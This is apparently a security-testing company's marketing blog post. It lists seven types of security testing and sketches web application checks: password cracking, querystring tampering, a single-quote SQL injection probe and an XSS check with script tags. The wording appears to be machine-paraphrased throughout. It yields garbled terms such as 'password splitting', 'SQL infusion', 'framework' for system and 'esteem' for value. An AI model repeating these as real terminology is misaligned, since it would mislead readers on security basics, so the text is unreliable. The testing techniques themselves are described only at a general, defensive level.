security testing in software testing

There are mainly seven types of security testing in software testing as per open source security testing tools methodology manual:

Vulnerability Scanning: This is done through automated software to examine a framework against known vulnerability marks.

Security Scanning: It includes recognizing system and framework weaknesses, and later gives answers for diminishing these dangers. This checking can be performed for both Manual and Automated scanning.

Penetration testing: This sort of testing mimics an assault from malevolent hackers. This testing includes examination of a specific framework to check for potential vulnerabilities to an external hacking endeavor.

Risk Assessment: This testing includes examination of security dangers saw in the association. Risks are named Low, Medium and High. This testing prescribes controls and measures to decrease the risk.

Security Auditing: This is an internal investigation of Applications and Operating frameworks for security imperfections. Review should likewise be possible by means of line by line examination of code

Ethical hacking: It’s hacking Organization Software frameworks. Dissimilar to malicious hackers, who hack for their own gains, the goal is to uncover security imperfections in the framework.

Posture Assessment: This joins Security checking, Ethical Hacking and Risk Assessments to demonstrate a general security posture of an association.

How to perform security testing in software testing?

To perform a helpful security testing for web application, the security tester should have great learning of the HTTP protocols. It is imperative to have an understanding of how the customer and the server connect utilizing HTTP. Also, the tester should at least know the nuts and bolts of XSS and SQL injection.

  1. Password splitting:

The website penetration testing can be commenced by “Password splitting”. Keeping in mind the end goal to sign in to the private territories of the application security, one can either figure a username/password or utilize some password cracker tool for the same. Arrangements of regular usernames and passwords are accessible along with open source security testing tools for web application.

  1. URL control through HTTP GET security testing test cases:

The tester should check if the application passes critical data in the querystring. This happens when the application utilizes the HTTP GET security testing test cases to pass data between the customer and the server. The data is passed in parameters in the querystring. The tester can adjust a parameter esteem in the querystring to check if the server acknowledges it.

  1. SQL Injection:

The following thing that should be checked is SQL infusion. Entering a solitary quote (‘) in any textbox should be dismissed by the application. Rather, if the tester experiences a database error, it implies that the client input is embedded in some inquiry which is then executed by the application. In such a case, the application is powerless against SQL injection.

  1. Cross Site Scripting (XSS):

The tester should also check the web application for XSS. Any HTML e.g. <HTML> or any content e.g. <SCRIPT> should not be acknowledged by the application. If it is, the application can be inclined to an assault by Cross Site Scripting.

Attackers can utilize this strategy to execute malevolent content or URL on victim’s browser.  Utilizing cross-site scripting, assailant can utilize contents like JavaScript to steal information stored in the cookies and user cookies.


TestOrigen provides best web security testing and information security testing using various website security testing tools and become boon for the various domains in term of data breaching safety. Our security testing techniques are latest and always updated time to time for giving high quality security testing in software testing world.


Share on: